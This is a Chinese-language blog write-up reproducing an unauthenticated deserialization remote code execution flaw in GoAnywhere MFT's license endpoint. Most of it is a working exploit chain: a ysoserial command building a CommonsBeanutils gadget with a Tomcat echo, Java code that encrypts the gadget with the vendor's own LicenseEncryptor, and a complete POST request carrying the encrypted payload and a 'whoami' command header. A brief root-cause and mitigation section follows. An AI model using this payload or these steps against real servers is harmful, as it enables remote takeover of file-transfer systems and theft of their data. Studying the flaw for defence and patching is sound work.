GoAnywhere 未授权反序列化RCE

警告
本文最后更新于 2023-02-06,文中内容可能已过时。

# 复现

下载 su18 修改版的 ysoserial(发布包名为 ysuserial):https://github.com/su18/ysoserial/releases/tag/v1.2

然后

cmd /c "java -jar ysuserial-1.2-su18-all.jar -g CommonsBeanutils2  -p EX-TomcatEcho > 1.bin"

然后用 Java 调用产品自带的 LicenseEncryptor 对 1.bin 加密,再做 URL-safe Base64 编码:

import com.linoma.license.gen2.LicenseEncryptor;
import com.linoma.security.commons.crypto.CryptoException;
import org.apache.commons.codec.binary.Base64;

import java.nio.file.Files;
import java.nio.file.Paths;

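/**
 * Proof-of-concept helper from the write-up: reads a serialized object from disk, encrypts it
 * with the product's own {@code LicenseEncryptor}, and prints the result as Base64 text suitable
 * for the {@code bundle} form parameter.
 *
 * <p>Security-relevant observation for reviewers: this program supplies no secret of its own. The
 * only inputs to the encryption step are the payload bytes and the literal {@code "1"}, so whatever
 * key material is used must come from the vendor library itself. Encryption done this way gives
 * confidentiality at best; it cannot authenticate who produced the bundle, and the receiving side
 * must not treat a successfully decrypted bundle as trusted input for {@code readObject}.
 */
public class Main {
    /**
     * Encrypts the file {@code 1.bin} and writes the Base64 form to standard output.
     *
     * @param args unused
     * @throws Exception if the file cannot be read or the vendor encryptor fails
     */
    public static void main(String[] args) throws Exception {
        // NOTE(review): the meaning of the boolean passed to initialize() is not visible on this
        // page; confirm against LicenseEncryptor before relying on it.
        LicenseEncryptor.getInstance().initialize(false);
        byte[] serialized = Files.readAllBytes(Paths.get("C:\\Users\\a\\Downloads\\1.bin"));
        byte[] ciphertext = encrypt(serialized, "1");
        byte[] encoded = encode(ciphertext, false);

        // Base64 output is pure ASCII. Naming the charset keeps the printed text independent of
        // the JVM's platform-default encoding, which the original new String(byte[]) relied on.
        System.out.println(new String(encoded, java.nio.charset.StandardCharsets.US_ASCII));
    }

    /**
     * Delegates to the vendor's singleton {@code LicenseEncryptor}.
     *
     * @param var0 plaintext bytes to encrypt
     * @param var1 second argument of {@code LicenseEncryptor#encrypt}; presumably a key or format
     *     version selector (the caller passes {@code "1"}) — TODO confirm
     * @return the encrypted bytes
     * @throws CryptoException if the vendor library rejects the input
     */
    private static byte[] encrypt(byte[] var0, String var1) throws CryptoException {
        return LicenseEncryptor.getInstance().encrypt(var0, var1);
    }

    /**
     * Base64-encodes {@code var0} with Apache Commons Codec.
     *
     * @param var0 bytes to encode
     * @param var1 passed as {@code isChunked}; its negation is passed as {@code urlSafe}, so
     *     {@code false} (the only value used here) yields unchunked, URL-safe output
     * @return the encoded bytes
     */
    private static byte[] encode(byte[] var0, boolean var1) {
        // Commons Codec signature: encodeBase64(binaryData, isChunked, urlSafe).
        return Base64.encodeBase64(var0, var1, !var1);
    }
}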
POST /goanywhere/lic/accept HTTP/1.1
Host: 172.16.16.145:8000
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
DNT: 1
Accept: */*
Referer: http://172.16.16.145:8000/goanywhere/auth/Login.xhtml
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ga;q=0.6
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5938
X-Token-Data:whoami

bundle=Jh88_jqGQWSbZmiCc1DErQhwOhCTLkYmA1yXgf86Ha5HF9IfVuQMLOfBS_fjlP7wTTEg2-Jx9nBDyFUKVTroXpFBt7zN1XDX58VKZCxCXlUD45d4laUUnNuzdyvNLT2b_gYKBi2-ny7fc2lOHNgalYV13mQzCTs0EgEUE9AuDUIMcFYx00pv4g4EOgEjeWbAx40rTtRby71AxapyXKy-4XChDHVlPB1AV3njBKGWT6gHdPxT8hb75Ycrpjdk9EQ1HW4WJiz4uaVBu7hXm_Eag15IpIWgojFy4hst8-q9YMms8Omq5lbdLabUHRcJAd6rLu6QrPLepYXQgGfMi_Qmj0qf5vXLfSX20cSBT_IEBlzzBR3lq_hiqrAfmZZCV3Y1HeMPpaMsmzL5zM1VTMX-5Pi5JGKMJ2Al2BZVZUUZQNqrcnueMVl1ZNhGMJ8eSFBCb4WGaNrhfgQ3sWUW3_A_ln_XwLi8z6XCOT5sJmFYZXBC4vYtY4leatX_o__lJHYPuA_TEmuEmEhIccj5Ou2xOvazmw9oXVUbM0vkPsb1UDyyTF0Ee85W0CUUCzb3rouvUDFaOZZLe08Z_Km2LgSq9Wr3fKojx_UevkOkOfwfiPlnJcQTRr45useRtOlHrJpP1iWSLi2vwK8bojMdCWzF13H8MmDjrJBCbcbChsXQkNcAJqkYa3y2SZXkwISRigFVLRnjDbyQLqLAzE0inCSf7GeXrZ5E6cD_6Bf7khmN7c8_NRPoJeOrRLivMQ5NLUuZHTlGBPF-6NAY-hcSxZkDgLRn17mvlOJ5Hpba21GeQwx12IfuRc5ZXCKJQzk6qhCvL-CsJSl8u9UVk7UXS5Ekq5xY6aMcfdo_9h3NrT5mavuxpf2pHRW81gt_iv9NB__HP-IvLK8RQsl1DVFTPs39pX3X0V8sns7r1hR0R4RxMJCdjDMjzch_WEqjabkA3TuliIFNg3caqDxIOX5SpCWtKTYTGhqXF7PgwNeBMVCN8ZkkeGUKEl6dapjeoT7xmKCgECIG0B5tBl9nnlozyd8fjCgwxO2eCyppJw6WFQXmnTfCgqiEy3Rb1V3TQJ28cR1ds7xXy3w5DPWTNJEyACCNH7S1AlMPE5McSokBWm4OrjxSpzQ1ZeSnjDjs3UxeTpBXxaqisqpKcx5bwQv7Qdeu6Ch1p9AkI5IwyIS1zxojOzR9YnD2e9L62gTR9RW4Ysn4GsCCFgm4el2jyYsM75ZvNJk5SU2-eH5znvX7ZY6UA8d9lfnF4UmRU5jDf-2jrB232h_UyYX-OzK8Dpy1z4g97qxd6p1l8LbGjNps_RgVRTpJ2271zCONm1fGF8GbbKc6aw4vL6gdf6yNV8uMnl7LeBqnW_m2r4nOY__gNJohlghZmzHhqedT6UPrbRGW17B-sxZ6xCuULmT5XS4vtq2cnt8-yk1RXCQiGCnXMUqhfO-CCeC4aOmrT_ao8L4gwXpoZcE43vEo2yelQtD3IzzCreRB1jz_Y_2FIP6SoFJmHVHXY4JMSNAZ9hSZab5Y0vyxIJtsuEPw9oGIR_bZIAGLuAQMD8CD6UfiXCvSq94giY9PWmd0F5187kSHrHGKZipdpsJFqR2_R3vIOwr-K4zsddwdBVBTn1dQRX5SOk7urIRca-BLXkyv8qcdapgDoeU2HjpNxqwxmd7CciJtolAEu0Pmq4HV8DIW-dPvFD_PXsm-spme1YrpZe0Xk28iXVUWqcnvSfjxKSUuJB6jQxtXYwQ5NrhS5AxPIqfsru9hBBRyRGBfNhSE62TgwPDhkB5mZB0Z46jGYzjJEUXMRL8G71L8E_Y1Gk5zWY1kJM7n7ZwXz9VYlXeyhUqU1hRgR5g_Cy1qAtgJP4wjR9fMQg-azeMOU72UurB8TEEG6xHZdpaxCsSBKnYZ94L1cPRxttBoBEx6dACH6xyLLWiKf5DAtVcavHHM6LBt4Mpax2_zzoeGUwvjgKtTV2dM-w-9_UAxUZqlpjyNu
DhzvBNhCjbT4q-x-wbLuHGOuYV5t0kGaete7YKONKL5p3YWQK12awHJQsIJbznrEwuZQgfYwfVgJXndnZwlx7TRIYpqbA0GJ3ciRyGKIggAD5mZCl0wYDNAxHPof2ivK4g2d_MjiwuJFCbIXNEutgpLUj3fXjpL_PGoEhEtOs8CgLxyH4hwRmLsVvUME2FjwcDW8_zSLu_1Q2fK3ITDTUljcWbTqfkCpcYFBUHVH3z-ztW1aodFXVgpipVlgpIp5Aw7VdWiD_iiDwXM6kqhLcfYZOiJOPfHaReigk-35k-51xbt7puZ5Q-jSEs9YkP9qr5Q8Ins30SnkA0LKLlQZ22-dRTFpcoO35-HQDmwQWArrEoysWITPSXYPXL16kxkwkhIGJSRkfrYnqN7Q1Cdg3Z11c56YzjWUtIxffebqHkuhue7tUC62G0tUlAIQQYUbDjb0X-a99p4nmQGIXdnLCvVLMS0g8ks7vZZ_tLLIFKKz0psHg1iZ_kYqxK5T9UdBU3o3jffDFzaE15ZHkTM7Nhp1ZI4wZHCOnGL0sHlOpMLYRAiH9a4yzkXnXjqfzkLSsfaD2jVaM-oFPEavY_SoIL1VaWDvsGOrRspmGddtParAQl1yJoI_xR_haMH0uvjCQ63JZ8Skhu080s3_nkSqXM682smZqcuX5KHs4PQ4a8Ez9UvYB_vM06vLYv9qi7C6z7pkNaWdC7eFOj8YFuX7KinOGJUew73xoKDuvmWNHmZqE7CRr42fFcR7nZAiv-mVLJgdRtuk6pQ6cK8pkvI0nEJ6Q9r4P9odGzAyrRryDxOf7LPcKbdQBP9C6k6Jm_UEmHpyC4AolJSMH0RwT02mvLd58XgcA6rieDD6w2aUARa7QXfLOpjitkV1smGZhn7txWfj2lzibZJDiN59pLf4V1YclRY3_HJlQiXvi1IUZYe9bKt4HaPaMVb1m9LlAu0l8AE1JcB4zzOpzfm784rJ6gnR6p_-QCCvO0yrp-wHrVeawcFoxtaqbTRXRHQMLwuXOZVrLDokyrXsv8bF_VhIl10pFFm8tXQ2Ah-CY-7d-fyFHtG6-GFS83E0lQbZnwKX84imVBQc-pZnTuhKxRCfOauchXyfF9vyUGykd6RkPXAHQaZYMaI22XpIY1Yes-nEnJor22Ct9CIqSzkRFGw6rBLfKS_qw02laLglUN_DOvLubAVV0_cX_6fiMOb_vZVYmjPeKHliagktHeKZHH53yKTLwT_R_BGIxjrV91ZCXEMOwEgg7ztxWfBwX4a52Hf2B4232EWE4WqhXV-5kFmFH0V-ZT2DQsrlWn0I_iDKzi-kFK3oXJd1x68PzwN3L5bqV4yRi8NcIYEWVEbYaqS_T5wUOYb54l6HGfKUQNtXNu1mqclPsLnj3cfeBqVNtS3-WKrkK-3VN5p4ht1nl4WOo0lyjBz2TfU-lQl9XVHLKONLV9kJSvVig6SuFbDn5au-XjER-aTBWIPrHXkUhVA6t0SPCUwkqwFe5RetfdfMw4D-mYGoM7nzXp3LQH2t2A6mV4CwNxTFdFPrALKWjl1gdZi054qrVnEBdntZ2bDT5zwLxqDyjgWWSvnSqdke83zNeJY0bAU-HaLE7BLMKOlaDTG2S31vnV-SCq7DQDjPCjPmpjJxTeE89j1eI-rqB_68t3AOqavB46-XzabUQ3vIKsH0fBkxFWVIHAlA8AgXXpdkwx7Qbi1tOggqhbWi9eif23eeE3yfn0Nld0dxaOlegv9wul1u4ZRl1o2wgDYVKlhq-7_xyzJU_JZRyj3Jl-4dUduNQO1ZMizOXX5_ObypljWW1Kk9DN97f39oF1UOWYML5LfIZIukqecmxh4Q3k5i4WXWcSk3X0-Qi63_ULgldKhKAB1ZkLX_bhXoCnBlLlrlzIPrLbopUkd-2-MBHMs9eQOXTmcbOV2qIEvxfo_KOzUFaS08o7lVI9eJJKMNldCzGOEcdf83z9j-pA91hj33RcRc8kmZ9bKbdunK
vqdZjzrKfiiPjaiEu-KwkkDWcHW5FW9E4lmCnPzRajRC8OBpBYgsu9EYPyqUA0RXxXBG34sMCBpiCJfti1cYN7qmCA45yS02kHe2xYm8scju3VVYuVsqsNMljE0fiSAo1goeasb3gBkVdWszrzuybFvWtlPAj3qjx1LQXExwcplC8edV4vckJ_9fohcSaKSbTv6MXdrpA81Nb9PRnJGaV1s3EAx8zT9BsKuZd5AW7nkpaQDvQ8IEUWtafKsF6liCm4evql8n3qWFUAppnvucPCDYiEyip2SGCidgjr0rRz3stUDP4wyI3cwDhLIC7RRJbdCC6Ezmce4N7Tn2n0_f63vcE16kkERp50KIcJ9JH6nkDARIlSvCXwngL9PlRhEpbrqqQ2TTyAdGE_TykOSHNqngkO-36zqmAIyoB3VjQ-94NO_Js-b667VMUpoe3P9Usgs7tNG6Q3mft9Mj4kVEomCQpCdJ_Bsmd5IdHuWq87xnmerbCQnOGaTAYDb31jKwhi0UrxSkNVx0RJ1OfjEsrEGogB6H6zRGGrD1m_fBgsErWBnuxZp0OlXWIqsFcIGA7dm096Qt-x0v4Kw3Uzpnd8VHGup_p_EIG4w0IWsel59pFYMZBDJpKvM9_L7mYHmsw_VVHspcGx1_UXBcWeMFzj8tEmdJqs8ij2ODWEn_25FUqBLJ4hEL9qn4ertqypGunt7URgW573pGiTxu9FVuExz1XPJB3Kdj2XtSCJCHfyambxlSZplTB-kDUsCdMLBmpsOtrxGCReq2Iluy67uyOBOwaQfwTN5EFsB-KSXMCqhF5QyfHAaM-TIJtNRKAJaM7B25Op5fNKkW-8kLfP8_nYGP5b5Neb7WZDTbmheVhppVlGZwjxI7c88hGmRIhxXjHmolA1vYDW7pyrQdj7GJGjsEi2CSsgdBtlHSghwS64R11x-Ps6yWegNbA3CqU7jCOtDXPKEOHeySNRgPuTHegCQJ8wSgfnpSHmwxEvk_1B6H-kuqHAqAmaxbTadaZbdGIeOi7s8nYI6a5klwm-or7llzB9yvPDBm-JB3c6D-Qlo1xDV5qtWZA44xg6ubBu6t6n_CHPk8zY1ZdJFiT04JCZnA6h6YY8Sr-vDifAnkn-zihidhrCSs8k-BL4tWFArg7BqQrEZ55TWhcN480_K94RXImnBOTD5VYuLc62M1lJ1vH5mof8cPvRRCJGFyYHBoa6LqDgVyMNUCUiF3BHttC42CtdOFBxTXzTSAYo6-GYrEHhqjPHRFCErLFIxoD7MuufE2AgIcHZpWMqw-orCmosDlPdnwor2bhK_pAxTKt3PDl1dWkZGy2hwBzxzmwi8KFM4akKKMEpSgddTwdO6qHfzELNXdGdlTP2zYkiBGXbpEo1RriD9-wFIbaid4nvMaz-xpkd5p1wosqlG6eqP7-9U2fZ-lMrWjHk8jeDX2yvvG2B32V5KBJl39IK8HnBJwq_zf8jGac1WbJUvC-whmELgOEYrMCKYwRrJE5d98YqEtZi0-Av20yQKztQIn4zUVFwMvlVLpWxDfRLXILIxmFrBMv3iZwoAo6mVKTS_LyJtz99aEcvFMFDYTnQXKGRnz5EX5uWrJ8UOg7H-QjVC8ADC9ty_0xDefx0WD8GYDSinecI_s_5LMln1DLExzmpFlcMj08r0cY12eYDlVXvSBjCTpqIGfgsea1Lu9m04pnmidTlL0vVs7NYXehXhJA-ykXbNVfa_qysR2dY8CyfUBKIlhhKNWE_ZliL__tHqkm9W-MReaLWhtA789n_-E_6lfvju5yohHwATJTjnUboGgLPVUhh-0YLf_CefMDeJz2KIRTnFb9CnnwacOwVBbn3XnGw5cjqIm9Hr1tsOwXvSd8vRZOpQHw1UCbrcK8QTqXLiJOsWXYymqkkcUfU1Km9InuJVJbVE947wLqPU1SQ

image.png

# 原理

从 Servlet 一步一步跟入(入口即上面请求中的 /goanywhere/lic/accept,读取 bundle 参数),直到 com.linoma.license.gen2.BundleWorker#unbundle

image.png

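在 com.linoma.license.gen2.BundleWorker#verify 中,解密后的数据被直接交给 readObject 反序列化。从上面的代码可以看出,加密只依赖产品自带的 LicenseEncryptor,调用方无需提供任何密钥,因此"能被正确解密"并不能证明 bundle 来自可信方,加密在这里起不到认证作用。防御上应升级到厂商的修复版本,限制该接口的网络访问,并监控对 /goanywhere/lic/accept 的 POST 请求。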

image.png

文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。